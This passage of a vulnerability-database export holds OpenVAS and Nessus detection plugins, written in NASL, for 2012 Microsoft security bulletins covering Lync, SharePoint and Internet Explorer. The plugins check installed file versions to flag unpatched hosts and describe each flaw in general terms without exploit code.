\"http://technet.microsoft.com/en-us/security/bulletin/ms12-039\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_ms_lync_detect_win.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/Lync/Installed\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\npath = \"\";\noglVer = \"\";\nattVer = \"\";\ncommVer = \"\";\n\n## Check for Microsoft Lync 2010/Communicator 2007 R2\nif(get_kb_item(\"MS/Lync/Ver\"))\n{\n ## Get Installed Path\n path = get_kb_item(\"MS/Lync/path\");\n if(path)\n {\n ## Get Version from communicator.exe\n commVer = fetch_file_version(sysPath:path, file_name:\"communicator.exe\");\n if(commVer)\n {\n if(version_in_range(version:commVer, test_version:\"3.5\", test_version2:\"3.5.6907.252\")||\n version_in_range(version:commVer, test_version:\"4.0\", test_version2:\"4.0.7577.4097\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n\n## For Microsoft Lync 2010 Attendee (admin level install) \n## For Microsoft Lync 2010 Attendee (user level install) \nif(get_kb_item(\"MS/Lync/Attendee/Ver\"))\n{\n ## Get Installed Path\n path = get_kb_item(\"MS/Lync/Attendee/path\");\n if(path)\n {\n ## Get Version from Ogl.dll\n oglVer = fetch_file_version(sysPath:path, file_name:\"Ogl.dll\");\n if(oglVer)\n {\n if(version_in_range(version:oglVer, test_version:\"4.0\", test_version2:\"4.0.7577.4097\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n\n## Check for Microsoft Lync 2010 Attendant\nif(get_kb_item(\"MS/Lync/Attendant/Ver\"))\n{\n ## Get Installed Path\n path = get_kb_item(\"MS/Lync/Attendant/path\");\n if(path)\n {\n ## Get Version from AttendantConsole.exe\n attVer = fetch_file_version(sysPath:path, file_name:\"AttendantConsole.exe\");\n if(attVer)\n {\n if(version_in_range(version:attVer, test_version:\"4.0\", test_version2:\"4.0.7577.4097\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-10T19:55:18", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-039.", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "openvas", "title": "Microsoft Lync Remote Code Execution Vulnerabilities (2707956)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1858", "CVE-2011-3402", "CVE-2012-0159", "CVE-2012-1849"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310902842", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902842", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Lync Remote Code Execution Vulnerabilities (2707956)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902842\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_bugtraq_id(50462, 53335, 53831, 53833);\n script_cve_id(\"CVE-2011-3402\", \"CVE-2012-0159\", \"CVE-2012-1849\", \"CVE-2012-1858\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 11:11:11 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Lync Remote Code Execution Vulnerabilities (2707956)\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027150\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-039\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_ms_lync_detect_win.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/Lync/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary code\n with kernel-level privileges. Failed exploit attempts may result in a\n denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Lync 2010\n\n - Microsoft Lync 2010 Attendee\n\n - Microsoft Lync 2010 Attendant\n\n - Microsoft Communicator 2007 R2\");\n\n script_tag(name:\"insight\", value:\"- An error within the Win32k kernel-mode driver (win32k.sys) when parsing\n TrueType fonts.\n\n - An error in the t2embed.dll module when parsing TrueType fonts.\n\n - The client loads libraries in an insecure manner, which can be exploited\n to load arbitrary libraries by tricking a user into opening a '.ocsmeet'\n file located on a remote WebDAV or SMB share.\n\n - An unspecified error in the 'SafeHTML' API when sanitising HTML code can\n be exploited to execute arbitrary HTML and script code in the user's chat\n session.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-039.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(get_kb_item(\"MS/Lync/Ver\"))\n{\n path = get_kb_item(\"MS/Lync/path\");\n if(path)\n {\n commVer = fetch_file_version(sysPath:path, file_name:\"communicator.exe\");\n if(commVer)\n {\n if(version_in_range(version:commVer, test_version:\"3.5\", test_version2:\"3.5.6907.252\")||\n version_in_range(version:commVer, test_version:\"4.0\", test_version2:\"4.0.7577.4097\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n\n## For Microsoft Lync 2010 Attendee (admin level install)\n## For Microsoft Lync 2010 Attendee (user level install)\nif(get_kb_item(\"MS/Lync/Attendee/Ver\"))\n{\n path = get_kb_item(\"MS/Lync/Attendee/path\");\n if(path)\n {\n oglVer = fetch_file_version(sysPath:path, file_name:\"Ogl.dll\");\n if(oglVer)\n {\n if(version_in_range(version:oglVer, test_version:\"4.0\", test_version2:\"4.0.7577.4097\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n\nif(get_kb_item(\"MS/Lync/Attendant/Ver\"))\n{\n path = get_kb_item(\"MS/Lync/Attendant/path\");\n if(path)\n {\n attVer = fetch_file_version(sysPath:path, file_name:\"AttendantConsole.exe\");\n if(attVer)\n {\n if(version_in_range(version:attVer, test_version:\"4.0\", test_version2:\"4.0.7577.4097\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-19T17:41:45", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS12-050.", "cvss3": {}, "published": "2012-07-11T00:00:00", "type": "openvas", "title": "Microsoft SharePoint Multiple Privilege Elevation Vulnerabilities (2695502)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1862", "CVE-2012-1858", "CVE-2012-1863", "CVE-2012-1861", "CVE-2012-1860", "CVE-2012-1859"], "modified": "2020-05-15T00:00:00", "id": "OPENVAS:1361412562310902847", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902847", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft SharePoint Multiple Privilege Elevation Vulnerabilities (2695502)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902847\");\n script_version(\"2020-05-15T08:09:24+0000\");\n script_bugtraq_id(53842, 54312, 54313, 54314, 54315, 54316);\n script_cve_id(\"CVE-2012-1858\", \"CVE-2012-1859\", \"CVE-2012-1860\", \"CVE-2012-1861\",\n \"CVE-2012-1862\", \"CVE-2012-1863\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-15 08:09:24 +0000 (Fri, 15 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-07-11 11:11:11 +0530 (Wed, 11 Jul 2012)\");\n script_name(\"Microsoft SharePoint Multiple Privilege Elevation Vulnerabilities (2695502)\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027232\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-050\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"gb_ms_sharepoint_sever_n_foundation_detect.nasl\", \"secpod_office_products_version_900032.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to bypass certain security\n restrictions and conduct cross-site scripting and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft InfoPath 2010\n\n - Microsoft Groove Server 2010\n\n - Microsoft Office Web Apps 2010\n\n - Microsoft SharePoint Server 2010\n\n - Microsoft SharePoint Foundation 2010\n\n - Microsoft InfoPath 2007 Service Pack 2\n\n - Microsoft InfoPath 2007 Service Pack 3\n\n - Microsoft InfoPath 2010 Service Pack 1\n\n - Microsoft Groove Server 2010 Service Pack 1\n\n - Microsoft Office Web Apps 2010 Service Pack 1\n\n - Microsoft SharePoint Server 2010 Service Pack 1\n\n - Microsoft SharePoint Foundation 2010 Service Pack 1\n\n - Microsoft Office SharePoint Server 2007 Service Pack 2\n\n - Microsoft Office SharePoint Server 2007 Service Pack 3\n\n - Microsoft Windows SharePoint Services 3.0 Service Pack 2\");\n\n script_tag(name:\"insight\", value:\"- Certain input is not properly sanitised in the 'SafeHTML' API before being\n returned to the user.\n\n - Certain unspecified input is not properly sanitised in scriptresx.ashx\n before being returned to the user. This can be exploited to execute\n arbitrary HTML and script code in a user's browser session in context of\n an affected site.\n\n - An error when validating search scope permissions can be exploited to view\n or modify another user's search scope.\n\n - Certain unspecified input associated with a username is not properly\n sanitised before being returned to the user. This can be exploited to\n execute arbitrary HTML and script code in a user's browser session in\n context of an affected site.\n\n - Certain unspecified input associated with a URL is not properly verified\n before being used to redirect users. This can be exploited to redirect a\n user to an arbitrary website.\n\n - Certain unspecified input associated with a reflected list parameter is\n not properly sanitised before being returned to the user. This can be\n exploited to execute arbitrary HTML and script code in a user's browser\n session in context of an affected site.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Microsoft Bulletin MS12-050.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## InfoPath 2007 and InfoPath 2010\nkeys = make_list(\"SOFTWARE\\Microsoft\\Office\\12.0\\InfoPath\\InstallRoot\",\n \"SOFTWARE\\Microsoft\\Office\\14.0\\InfoPath\\InstallRoot\");\nforeach key(keys)\n{\n if(registry_key_exists(key:key))\n {\n infoPath = registry_get_sz(key:key, item:\"Path\");\n\n if(infoPath)\n {\n exeVer = fetch_file_version(sysPath:infoPath, file_name:\"Infopath.Exe\");\n dllVer = fetch_file_version(sysPath:infoPath, file_name:\"Ipeditor.dll\");\n if((exeVer &&\n (version_in_range(version:exeVer, test_version:\"12.0\", test_version2:\"12.0.6661.4999\") ||\n version_in_range(version:exeVer, test_version:\"14.0\", test_version2:\"14.0.6120.4999\"))) ||\n (dllVer &&\n (version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6661.4999\") ||\n version_in_range(version:dllVer, test_version:\"14.0\", test_version2:\"14.0.6120.4999\"))))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n\n## Microsoft Groove 2010\nexeVer = get_kb_item(\"SMB/Office/Groove/Version\");\nif(exeVer && exeVer =~ \"^14\\.\")\n{\n key = \"SOFTWARE\\Microsoft\\Office Server\\14.0\\Groove\";\n if(registry_key_exists(key:key))\n {\n dllPath = registry_get_sz(key:key, item:\"EMSInstallDir\");\n if(dllPath)\n {\n dllVer = fetch_file_version(sysPath:dllPath, file_name:\"groovems.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"14.0\", test_version2:\"14.0.6116.4999\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n }\n}\n\ncpe_list = make_list(\"cpe:/a:microsoft:sharepoint_server\", \"cpe:/a:microsoft:sharepoint_foundation\", \"cpe:/a:microsoft:sharepoint_services\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\ncpe = infos[\"cpe\"];\n\n## SharePoint Server 2007 and 2010\nif(\"cpe:/a:microsoft:sharepoint_server\" >< cpe)\n{\n ## SharePoint Server 2007 Service Pack 2 (coreserver)\n if(vers =~ \"^12\\.\"){\n key = \"SOFTWARE\\Microsoft\\Office Server\\12.0\";\n file = \"Microsoft.sharepoint.publishing.dll\";\n }\n\n ## SharePoint Server 2010 (wosrv)\n else if(vers =~ \"^14\\.\"){\n key = \"SOFTWARE\\Microsoft\\Office Server\\14.0\";\n file = \"Microsoft.office.server.native.dll\";\n }\n\n if(key && registry_key_exists(key:key) && file)\n {\n if(path = registry_get_sz(key:key, item:\"BinPath\"))\n {\n dllVer = fetch_file_version(sysPath:path, file_name:file);\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6660.4999\") ||\n version_in_range(version:dllVer, test_version:\"14.0\", test_version2:\"14.0.6108.4999\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n }\n}\n\n## SharePoint Foundation 2010\nif(\"cpe:/a:microsoft:sharepoint_foundation\" >< cpe)\n{\n key = \"SOFTWARE\\Microsoft\\Shared Tools\\Web Server Extensions\\14.0\";\n if(registry_key_exists(key:key))\n {\n dllPath = registry_get_sz(key:key, item:\"Location\");\n if(dllPath)\n {\n dllVer = fetch_file_version(sysPath:dllPath, file_name:\"BIN\\Onetutil.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"14.0\", test_version2:\"14.0.6120.5004\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n }\n}\n\n## SharePoint Services 3.0 and 2.0\nif(\"cpe:/a:microsoft:sharepoint_services\" >< cpe)\n{\n key = \"SOFTWARE\\Microsoft\\Shared Tools\";\n if(registry_key_exists(key:key))\n {\n dllPath = registry_get_sz(key:key, item:\"SharedFilesDir\");\n if(dllPath)\n {\n dllVer = fetch_file_version(sysPath:dllPath, file_name:\"web server extensions\\12\\BIN\\Onetutil.dll\");\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6661.4999\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n\n dllVer2 = fetch_file_version(sysPath:dllPath, file_name:\"web server extensions\\60\\BIN\\Onetutil.dll\");\n if(dllVer2 && dllVer2 =~ \"^11\\.0\")\n {\n if(version_is_less(version:dllVer2, test_version:\"11.0.8346.0\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n }\n}\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T14:23:40", "description": "The remote host is missing Internet Explorer (IE) Security Update 2699988.\n\nThe installed version of IE is affected by several vulnerabilities that could allow an attacker to execute arbitrary code on the remote host.", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "nessus", "title": "MS12-037: Cumulative Security Update for Internet Explorer (2699988)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1523", "CVE-2012-1858", "CVE-2012-1872", "CVE-2012-1873", "CVE-2012-1874", "CVE-2012-1875", "CVE-2012-1876", "CVE-2012-1877", "CVE-2012-1878", "CVE-2012-1879", "CVE-2012-1880", "CVE-2012-1881", "CVE-2012-1882"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:microsoft:ie", "cpe:/o:microsoft:windows"], "id": "SMB_NT_MS12-037.NASL", "href": "https://www.tenable.com/plugins/nessus/59455", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59455);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2012-1523\",\n \"CVE-2012-1858\",\n \"CVE-2012-1872\",\n \"CVE-2012-1873\",\n \"CVE-2012-1874\",\n \"CVE-2012-1875\",\n \"CVE-2012-1876\",\n \"CVE-2012-1877\",\n \"CVE-2012-1878\",\n \"CVE-2012-1879\",\n \"CVE-2012-1880\",\n \"CVE-2012-1881\",\n \"CVE-2012-1882\"\n );\n script_bugtraq_id(\n 53841,\n 53842,\n 53843,\n 53844,\n 53845,\n 53847,\n 53848,\n 53866,\n 53867,\n 53868,\n 53869,\n 53870,\n 53871\n );\n script_xref(name:\"EDB-ID\", value:\"19777\");\n script_xref(name:\"EDB-ID\", value:\"20174\");\n script_xref(name:\"EDB-ID\", value:\"24017\");\n script_xref(name:\"EDB-ID\", value:\"33944\");\n script_xref(name:\"EDB-ID\", value:\"35815\");\n script_xref(name:\"MSFT\", value:\"MS12-037\");\n script_xref(name:\"MSKB\", value:\"2699988\");\n\n script_name(english:\"MS12-037: Cumulative Security Update for Internet Explorer (2699988)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2699988.\n\nThe installed version of IE is affected by several vulnerabilities\nthat could allow an attacker to execute arbitrary code on the remote\nhost.\");\n # http://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7d49512\");\n # http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18c6adba\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-093/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-190/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-192/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-193/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-194/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523185/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523186/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523196/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-037\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\nand 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS12-037';\nkb = '2699988';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"9.0.8112.20551\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"9.0.8112.16446\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.21976\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.17824\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21198\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17006\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20551\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16446\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23359\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19272\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22838\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18616\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23345\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19258\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21312\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17110\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.4986\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23345\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19258\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21312\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17110\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6212\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n 